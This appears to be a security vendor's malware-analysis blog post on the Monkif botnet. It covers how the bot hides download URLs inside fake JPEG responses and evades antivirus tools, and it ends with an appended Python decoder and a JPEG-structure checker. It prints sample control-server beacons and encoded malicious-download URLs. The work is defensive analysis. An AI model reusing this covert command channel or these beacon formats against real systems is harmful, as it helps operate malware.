The Latest in IT Security

Monkif Botnet Hides Commands in JPEGs


With new threats employing unique and complex capabilities arriving daily, it is surprising to find a bot still using a Swedish control server that was already active in 2009. Malware authors generally keep changing their control servers, especially after reports about them surface, but not in this case. The network belongs to , which hosts the server at IP address and is an Internet service provider.

Here is a quote from their English website:

Refugee hosting
Our boundless commitment to free speech has been tested and proven over and over again. If it is legal in Sweden, we will host it, and will keep it up regardless of any pressure to take it down. We have ZERO tolerance against SPAM and related services!

This botnet is Monkif, which uses stealth techniques to hide its commands. It receives download URLs encoded inside files that look like JPEG images, so the traffic passes network intrusion prevention systems as ordinary image downloads. We have also found some samples that use SSL communications to download other threats.

The site is also hosted on the same network, at IP

Figure 1. GET request with control server.

Figure 2. SSL communication with control server.

Figure 3. SSL certificate.

The bot installs itself as a browser plug-in or browser helper object (BHO). Before it runs, it enumerates all running programs and compares their names, and those of their parent processes, against a list of antivirus and firewall programs, so that it can avoid detection while executing. The names of these security programs are stored encrypted in the binary, and the algorithm used to hide them differs from sample to sample.

To evade detection further, Monkif uses a random script name and parameter name for each request and encodes the parameter value:

GET /photo/lfzt.php?rzj=51<75=26x644646x4x4x4x524x7x0x6x5x5772=716?5772=70<x

GET /babynot/pzj.php?dnr=722576<x644420x4x4x4x0x

GET /sodoma/xcgyscm.php?gquo=<<<6<4x644475x4x4

GET /karaq/mueoyisc.php?wgau=127=27?64446<x4x4x4x53

The response to these requests is an image file. Monkif compares the first 32 bytes of the JPEG header against a 32-byte header embedded in the sample; if they match, it decodes the remaining bytes, which yield the URL of a malicious file to download.

Figure 4. The control server responds with an image file.

The decryption follows:

Figure 4b. Decrypting the JPEG to reveal the URL for a malicious download.

(Encoded) lppt>++<<*<4*3*516+`+`h*tlt;bh9`<5a2<6ge<a323b5gf5b4=610fb=gga4″bm`9560″591595907|200041|0|0|0|0


(Encoded) lppt>++<<*<4*3*516+`+`h*tlt;bh9faf<<“6g`eefb0`63=64143`g6=b<<5″bm`9560″591753617|200042|0|0|0|0


(Encoded) lppt>++<<*<4*3*516+`+`h*tlt;bh9b3`5a<0423ag11`=a14b4`=5f<520e25″bm`9561″591925694|200044|0|0|0|0
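As an added example (not McAfee's tooling and not the malware's own code), the following Python decodes both the beacon parameters and the image response described above. The byte transform is inferred from the samples on this page rather than stated by the post: XORing each byte with 0x04 turns "lppt>++" into "http://", "*" into ".", "x" into "|" and ";" into "?", and the same key turns the query values into "|"-separated records whose second field is the same 2000xx number that appears in plain form at the end of each response. The 32-byte reference header, the response body and the 192.0.2.10 URL are constructed stand-ins, since the post shows neither the header bytes nor the decoded control-server URL.

```python
"""Decoder for the Monkif beacon and image-response encoding seen above.

Added example, not code from McAfee or from the malware. The transform is
inferred from the page's own samples: XOR 0x04 maps "lppt>++" to "http://".
"""
import re

XOR_KEY = 0x04  # inferred from the samples; the post never names the algorithm


def decode(blob: bytes) -> str:
    """Undo the per-byte XOR; the transform is its own inverse."""
    return bytes(b ^ XOR_KEY for b in blob).decode("latin-1")


def encode(text: str) -> bytes:
    """Apply the same transform (used here only to build test data)."""
    return bytes(b ^ XOR_KEY for b in text.encode("latin-1"))


def decode_request(request_line: str) -> dict:
    """Split a beacon such as 'GET /photo/lfzt.php?rzj=51<75...' into parts.

    The random script and parameter names are left alone; only the value is
    encoded, and its decoded form is a '|'-separated record.
    """
    m = re.fullmatch(r"GET\s+(\S+?)\?(\w+)=(\S+)", request_line.strip())
    if not m:
        raise ValueError("expected 'GET <path>?<name>=<value>'")
    path, name, value = m.groups()
    decoded = decode(value.encode("latin-1"))
    return {"path": path, "param": name, "decoded": decoded,
            "fields": decoded.split("|")}


# Constructed stand-in for the 32-byte header embedded in the sample (the post
# does not show it): a JFIF preamble padded with zeros to 32 bytes.
REFERENCE_HEADER = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
).ljust(32, b"\x00")


def extract_download_url(body: bytes, reference: bytes = REFERENCE_HEADER):
    """Mimic the bot: accept the body only if its first 32 bytes match the
    reference header, then decode what follows. The captures above show the
    trailing '|2000xx|0|0|0|0' fields in plain form, so decoding stops at the
    first literal '|' (an encoded '|' would appear as 'x').
    Returns (url, fields) or None."""
    if len(body) < 32 or body[:32] != reference[:32]:
        return None
    payload = body[32:]
    cut = payload.find(b"|")
    enc, tail = (payload, b"") if cut < 0 else (payload[:cut], payload[cut:])
    fields = tail.decode("latin-1").split("|")[1:] if tail else []
    return decode(enc), fields


def walks_as_jpeg(body: bytes) -> bool:
    """Defender-side check: a genuine JPEG is a chain of FFxx segments that
    reaches SOS (FF DA). The bot's response only copies a short valid prefix,
    so the walk breaks as soon as it reaches the encoded URL."""
    if body[:2] != b"\xff\xd8":
        return False
    pos = 2
    while pos + 4 <= len(body):
        if body[pos] != 0xFF:
            return False
        marker = body[pos + 1]
        if marker == 0xFF:                       # fill byte before a marker
            pos += 1
            continue
        if marker == 0xDA:                       # start of scan: image data follows
            return True
        if marker == 0xD9:                       # EOI before any scan
            return False
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:
            pos += 2                             # standalone marker, no length
            continue
        seg_len = int.from_bytes(body[pos + 2:pos + 4], "big")
        if seg_len < 2:
            return False
        pos += 2 + seg_len
    return False


# Sample input: the four beacons quoted in the post, verbatim.
SAMPLE_REQUESTS = [
    "GET /photo/lfzt.php?rzj=51<75=26x644646x4x4x4x524x7x0x6x5x5772=716?5772=70<x",
    "GET /babynot/pzj.php?dnr=722576<x644420x4x4x4x0x",
    "GET /sodoma/xcgyscm.php?gquo=<<<6<4x644475x4x4",
    "GET /karaq/mueoyisc.php?wgau=127=27?64446<x4x4x4x53",
]

# Constructed response in the shape of Figure 4; the URL is a hypothetical
# TEST-NET address, not the control server the post leaves unnamed.
HYPOTHETICAL_URL = "http://192.0.2.10/photo/get.php?fl=0a1b2c3d&fid=7"
SAMPLE_RESPONSE = REFERENCE_HEADER + encode(HYPOTHETICAL_URL) + b"|200041|0|0|0|0"

# A minimal genuine JPEG skeleton (JFIF preamble, SOS, a few data bytes, EOI).
MINIMAL_JPEG = (REFERENCE_HEADER[:20]
                + b"\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00"
                + b"\x00" * 8 + b"\xff\xd9")

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(decode_request(line)["decoded"])
    print(extract_download_url(SAMPLE_RESPONSE))
    print(walks_as_jpeg(SAMPLE_RESPONSE), walks_as_jpeg(MINIMAL_JPEG))
```

The first beacon decodes to "15831962|200202|0|0|0|160|3|4|2|1|13369352;13369348|", a bot identifier followed by the same kind of numeric fields that the responses carry in plain form. The three encoded response lines above can be passed through decode() in the same way; they are not decoded here because the post deliberately leaves the control server unnamed. The walks_as_jpeg check is the defender's side of the same observation: a body served as an image whose segment chain breaks right after a short valid prefix is exactly what this bot's traffic looks like, and a network sensor that validates image structure rather than only the first bytes will not be fooled by the header alone.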


Monkif then requests the decoded URL and downloads another executable. At present we see the botnet downloading adware, but it could just as easily deliver more complex threats.

Figure 5. Downloading another malicious file.

McAfee customers are protected by signature 0?48807500.
